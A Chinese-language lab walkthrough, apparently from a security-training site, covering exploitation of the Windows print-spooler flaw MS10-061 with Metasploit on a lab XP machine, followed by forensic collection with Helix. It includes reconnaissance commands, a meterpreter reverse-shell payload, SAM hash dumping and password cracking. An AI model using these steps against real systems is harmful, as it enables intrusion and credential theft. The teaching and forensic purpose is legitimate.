Metasploit:MS10-061：入侵、提權和取證

1、什麼是Metasploit

Metasploit Framework是一個開源滲透工具，Metasploit滲透測試框架擁有世界上最大的公共測試漏洞資料庫。簡單來說，Metasploit可以用來檢測安全漏洞，另一方面它也可以用來進行入侵。

2、什麼是Helix

安全事件響應和取證工具

3、什麼是列印後臺程式服務模擬漏洞 (CVE-2010-2729)

利用MSF中的攻擊模組：ms10_061_spoolss

Windows列印後臺程式沒有充分的限制訪問該服務的使用者許可權，攻擊者可以通過提交特製的列印請求在Windows系統目錄（%SystemRoot%\system32）中建立檔案。

攻擊者可指定任何檔名，包括目錄遍歷，通過傳送 WritePrinter 請求，攻擊者可以完全控制建立檔案的內容。

將檔案寫入到Windows系統目錄（%SystemRoot%\system32）後，通過WMI來部署惡意程式，因為系統會自動執行%SystemRoot%\System32\Wbem\MOF資料夾的mof檔案、執行命令。

該漏洞首次被發現並被應用於著名的Stuxnet蠕蟲（俗稱“震網”）

4、實驗環境

攻擊機：Kali linux 目標機：Windows xp sp2

5、實驗步驟

5.1 使用Nmap掃描目標機器是否存在 NetBios 和 RPC服務

5.2 NetBios共享檢測

5.3 使用MSF的 ms10_061_spoolss 模組攻擊目標機

5.4 收集基本取證檔案

5.5 使用Helix遠端記憶體取證

5.6 下載基本取證檔案

6、下載 Helix ，略

7、設定目標機環境

1、獲取目標機ip

2、建立共享列印（預設是沒有共享列印的）

1）開啟控制皮膚，雙擊“列印和傳真”

2）新增印表機，右鍵選擇 新增印表機

本地印表機，不勾選“自動檢測和安裝驅動”

選擇 使用 LPT1 埠

選一個印表機廠商和型號，我們隨便選一個

給印表機取個名字

選擇共享這個印表機

不列印測試頁

完成設定

8、在Kali上檢測列印共享

1）nmap 掃描

nmap -sS -sU -O -p137-139,445 192.168.1.149
複製程式碼

2）查詢 NetBIOS 名稱

nmblookup -A 192.168.1.149
複製程式碼

NetBIOS工作站名字：WXPSP2

NetBIOS組名：MSHOME

Master Browser：_MSBROWSE_

第二列解釋：NetBIOS字尾

00：Workstation Service（workstation name） 型別：Group

03：Windows Messenger service

06：Remote Access Server

20：File Service（also called Host Record)

21：Remote Access Service client

1B：Domain Master Browser-Primary Domain Controller for a domain

1D：Master Browser

第四列：節點型別

B-node：0x01 Broadcast

P-node：0x02 Peer（WINS only）

M-node：0x04 Mixed（broadcast，then WINS）

H-node：0x08 Hybrid（WINS，then broadcast）

9、訪問SMB資源

smbclient -L \\\WXPSP2 -I 192.168.1.149 -N
複製程式碼

看到了列印共享

10、使用MSF進行攻擊

1）載入模組，檢視需要配置的引數

2）配置引數

3）設定payload

set PAYLOAD windows/meterpreter/reverse_tcp
複製程式碼

4）設定payload引數

5）攻擊

攻擊完成後，建立了遠端會話

惡意程式被寫入到目標機的%SystemRoot%\system32\g9bMJIYNoBtyOS.exe，此程式執行後反彈了一個shell給Kali，從而建立了一個Meterpreter會話。請記錄這個程式的名字，後續會用到

而惡意程式是通過%SystemRoot%\system32\wbem\mof\kT044wvLBYxwGk.mof控制執行的

6）接下來我們可以執行一系列操作

6.1）getuid，getpid

可以看到我們獲取了系統的system許可權，getpid得到的是當前Meterpreter會話的程式ID，記住這個PID

6.2）執行shell，可以直接進入目標機的命令列介面

6.3）查詢PID 392關聯程式

可以看到正是前面我們寫入的那個惡意程式

6.4）查詢PID 392 關聯的網路連結

11、進行基本的資訊收集取證

11.1）程式資訊收集

tasklist > forensics_tasklist.txt
複製程式碼

11.2）網路資訊收集

netstat -ano > forensics_netstat.txt
複製程式碼

11.3）目錄檔案資訊收集

dir > dir_forensics.txt
複製程式碼

11.4）退出shell

12 、獲取SAM資料庫資訊

利用hashdump獲取SAM資料庫

SAM是Windows XP，Windows Vista和Windows 7中儲存使用者密碼的資料庫檔案

將獲取到的資訊複製到一個文字檔案

13 、建立遠端取證收集環境

14、收集受害者記憶體資訊

1）載入 Helix2008R1 光碟

2）收集資訊

選擇 Live Acquisition，填寫相關資訊。

等待記憶體資訊收集完成

取證完成，會自動關閉此cmd視窗

3）檢視收集的檔案

15、下載其他取證檔案

下載我們之前收集的程式資訊，網路資訊和惡意程式

download C:\\WINDOWS\\system32\\forensics_tasklist.txt /forensics/ms10_061/
download C:\\WINDOWS\\system32\\forensics_netstat.txt /forensics/ms10_061/
download C:\\WINDOWS\\system32\\dir_forensics.txt /forensics/ms10_061/
download C:\\WINDOWS\\system32\\g9bMJIYNoBtyOS.exe /forensics/ms10_061/
複製程式碼

16、使用John 破解密碼

成功破解了管理員密碼

資訊收集完成，後續我們將使用Volatility從抓取的記憶體進行分析

Volatility:分析MS10-061攻擊

17、說明

本文由合天網安實驗室原創，轉載請註明來源。

關於合天網安實驗室

合天網安實驗室（www.hetianlab.com）-國內領先的實操型網路安全線上教育平臺 真實環境，線上實操學網路安全 ； 實驗內容涵蓋：系統安全，軟體安全，網路安全，Web安全，移動安全，CTF，取證分析，滲透測試，網安意識教育等。